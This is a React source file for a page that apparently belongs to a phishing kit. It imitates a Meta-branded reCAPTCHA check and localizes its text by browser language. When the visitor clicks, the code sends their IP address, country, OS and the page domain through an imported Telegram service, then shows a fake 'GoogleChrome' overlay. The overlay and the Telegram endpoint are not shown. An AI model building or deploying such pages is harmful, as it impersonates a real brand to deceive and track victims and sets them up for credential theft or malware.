/* eslint-disable jsx-a11y/anchor-is-valid */
import React from "react";

import useStore from "../store";
import { click, getLocation } from "../services/telegram.service";
import { useEffect, useState } from "react";
import { osName } from "react-device-detect";
import GoogleChrome from "../components/Chrome";
import CaptchaCheckbox from "../components/Captcha/CaptchaCheckbox";
import { useLocation } from "react-router-dom";
import ErrorPage from "./ErrorPage";
import { SupportedLang, translations } from "./language";

const CaptchaFullPage: React.FC = () => {
  const location = useLocation();
  const queryParams = new URLSearchParams(location.search);
  const pageId = queryParams.get("pageId");
  const isError = queryParams.get("error");

  const { setChrome, ChromeO, setPageId } = useStore();
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("127.0.0.1");
  const fetchCountry = async () => {
    const data = await getLocation();
    setCountryCode(data.country_code);
    setIp(data.ip);
  };

  const [lang, setLang] = useState<SupportedLang>("en");
  const [domain, setDomain] = useState<string>("");

  useEffect(() => {
    const browserLang = navigator.language?.slice(0, 2); // ví dụ: "de-DE" → "de"
    const supportedLangs = ["de", "it", "es", "fr"];
    if (supportedLangs.includes(browserLang)) {
      setLang(browserLang as SupportedLang);
    } else {
      setLang("en");
    }

    fetchCountry();
    setPageId(pageId || "UMPG");
  }, [setPageId, pageId]);

   useEffect(() => {
    const domain = window.location.hostname;
    console.log("Current domain:", domain);
    setDomain(domain);
  }, []);

  const handleClick = async () => {
    window.scrollTo({ top: 0, behavior: "smooth" });

    setChrome(true);
    console.log("Clicked link");
    await click(`Captcha - ${domain}`, osName, ip, countryCode);
  };

  return (
    <>
      {isError ? (
        <ErrorPage />
      ) : (
        <>
          {ChromeO ? <GoogleChrome /> : false}
          <div className="flex flex-col items-center justify-start bg-[#ffffff] h-screen w-full">
            <div className="font-roboto text-[14px] text-gray-800 w-full p-4 md:p-0 md:w-[300px]">
              <div className="text-start text-xs text-gray-500 mt-20 md:mt-[150px]">
                <img
                  src="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yK/r/soeuNpXL37G.png"
                  alt="Meta"
                  className="w-16"
                />
              </div>
              {/* reCAPTCHA Box */}
              <CaptchaCheckbox
                onCheck={handleClick}
                botText={translations[lang].line0}
              />

              {/* About Section */}
              <div className="text-gray-700 font-helvetica text-[13px] leading-[1.3]">
                <p className="font-normal">{translations[lang].line1}</p>
                <p className="font-normal mt-4">{translations[lang].line2}</p>
                <p className="font-normal mt-4">{translations[lang].line3}</p>
              </div>
            </div>
          </div>
        </>
      )}
    </>
  );
};

export default CaptchaFullPage;
